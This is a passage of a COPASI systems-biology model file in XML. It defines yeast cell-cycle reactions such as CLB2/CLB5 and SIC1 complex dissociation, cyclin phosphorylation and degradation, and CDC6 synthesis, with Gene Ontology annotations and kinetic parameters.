<Constant key="Parameter_4155" name="kasb5" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_60">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_332">
<SourceParameter reference="Metabolite_93"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_324">
<SourceParameter reference="Metabolite_143"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_326">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_328">
<SourceParameter reference="ModelValue_65"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_49" name="Dissoc. of CLB5/SIC1" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_49">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0043624" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_29" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_93" stoichiometry="1"/>
<Product metabolite="Metabolite_143" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4156" name="kdib5" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_61">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_327">
<SourceParameter reference="Metabolite_29"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_322">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_323">
<SourceParameter reference="ModelValue_92"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_48" name="Phosphorylation of C2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_48">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.22" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004693" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_37" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_33" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4157" name="Vkpc1" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_62">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_325">
<SourceParameter reference="Metabolite_37"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_321">
<SourceParameter reference="ModelValue_158"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_319">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_47" name="Dephosphorylation of C2P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_47">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.1.3.48" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004721" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_33" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_37" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4158" name="Vppc1" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_63">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_337">
<SourceParameter reference="Metabolite_33"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_318">
<SourceParameter reference="ModelValue_169"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_316">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_46" name="Phosphorylation of C5" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_46">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.22" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004693" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_29" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_25" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4159" name="Vkpc1" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_64">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_320">
<SourceParameter reference="Metabolite_29"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_315">
<SourceParameter reference="ModelValue_158"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_313">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_45" name="Dephosphorylation of C5P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_45">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.1.3.48" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004721" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_25" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_29" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4160" name="Vppc1" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_65">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_317">
<SourceParameter reference="Metabolite_25"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_312">
<SourceParameter reference="ModelValue_169"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_310">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_44" name="Degradation of CLB2 in C2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_44">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_37" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_143" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4161" name="Vdb2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_66">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_314">
<SourceParameter reference="Metabolite_37"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_309">
<SourceParameter reference="ModelValue_155"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_307">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_43" name="Degradation of CLB5 in C5" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_43">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_29" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_143" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4162" name="Vdb5" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_67">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_311">
<SourceParameter reference="Metabolite_29"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_306">
<SourceParameter reference="ModelValue_154"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_304">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_42" name="Degradation of SIC1 in C2P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_42">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_33" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_89" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4191" name="kd3c1" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_68">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_308">
<SourceParameter reference="Metabolite_33"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_301">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_303">
<SourceParameter reference="ModelValue_81"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_41" name="Degradation of SIC1P in C5P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_41">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_25" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_93" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4193" name="kd3c1" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_69">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_305">
<SourceParameter reference="Metabolite_25"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_298">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_300">
<SourceParameter reference="ModelValue_81"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_40" name="Degradation of CLB2 in C2P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_40">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_33" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_145" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4194" name="Vdb2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_70">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_302">
<SourceParameter reference="Metabolite_33"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_297">
<SourceParameter reference="ModelValue_155"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_295">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_39" name="Degradation of CLB5 in C5P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_39">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_25" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_145" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4195" name="Vdb5" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_71">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_299">
<SourceParameter reference="Metabolite_25"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_294">
<SourceParameter reference="ModelValue_154"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_292">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_38" name="CDC6 synthesis" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_38">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_77" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_151" stoichiometry="1"/>
<Modifier metabolite="Metabolite_141" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4196" name="ksf6_p" value="1"/>
<Constant key="Parameter_4192" name="ksf6_p_p" value="1"/>
<Constant key="Parameter_4197" name="ksf6_p_p_p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_72">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_283">
<SourceParameter reference="Metabolite_141"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_289">
<SourceParameter reference="Metabolite_151"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_287">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_291">
<SourceParameter reference="ModelValue_134"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_296">
<SourceParameter reference="ModelValue_135"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_285">
<SourceParameter reference="ModelValue_136"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_37" name="Phosphorylation of CDC6" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_37">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.22" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004693" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_77" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_79" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4198" name="Vkpf6" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_73">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_286">
<SourceParameter reference="Metabolite_77"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_282">
<SourceParameter reference="ModelValue_159"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_290">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_36" name="Dephosphorylation of CDC6" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_36">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.1.3.48" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004721" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_79" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_77" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4199" name="Vppf6" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_74">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_284">
<SourceParameter reference="Metabolite_79"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_293">
<SourceParameter reference="ModelValue_170"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_280">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_35" name="Degradation of CDC6P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_35">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_79" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4200" name="kd3f6" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_75">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_288">
<SourceParameter reference="Metabolite_79"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_277">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_279">
<SourceParameter reference="ModelValue_82"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_34" name="CLB2/CDC6 complex formation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_34">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005515" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043623" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_89" stoichiometry="1"/>
<Substrate metabolite="Metabolite_77" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_103" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4201" name="kasf2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_76">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_272">
<SourceParameter reference="Metabolite_77"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_281">
<SourceParameter reference="Metabolite_89"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_274">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_276">
<SourceParameter reference="ModelValue_68"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_33" name="CLB2/CDC6 dissociation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_33">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0043624" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_103" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_89" stoichiometry="1"/>
<Product metabolite="Metabolite_77" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4202" name="kdif2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_77">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_275">
<SourceParameter reference="Metabolite_103"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_270">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_271">
<SourceParameter reference="ModelValue_94"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_32" name="CLB5/CDC6 complex formation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_32">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005515" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043623" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_93" stoichiometry="1"/>
<Substrate metabolite="Metabolite_77" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_107" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4203" name="kasf5" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_78">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_265">
<SourceParameter reference="Metabolite_77"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_273">
<SourceParameter reference="Metabolite_93"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_267">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_269">
<SourceParameter reference="ModelValue_69"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_31" name="CLB5/CDC6 dissociation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_31">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0043624" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_107" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_93" stoichiometry="1"/>
<Product metabolite="Metabolite_77" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4204" name="kdif5" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_79">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_268">
<SourceParameter reference="Metabolite_107"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_246">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_258">
<SourceParameter reference="ModelValue_95"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_30" name="F2 phosphorylation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_30">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.22" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004693" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_103" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_105" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4205" name="Vkpf6" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_80">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_266">
<SourceParameter reference="Metabolite_103"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_254">
<SourceParameter reference="ModelValue_159"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_264">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_29" name="F2P dephosphorylation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_29">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.1.3.48" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004721" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_105" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_103" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4206" name="Vppf6" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_81">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_278">
<SourceParameter reference="Metabolite_105"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_566">
<SourceParameter reference="ModelValue_170"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_568">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_28" name="F5 phosphorylation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_28">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.22" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004693" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_107" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
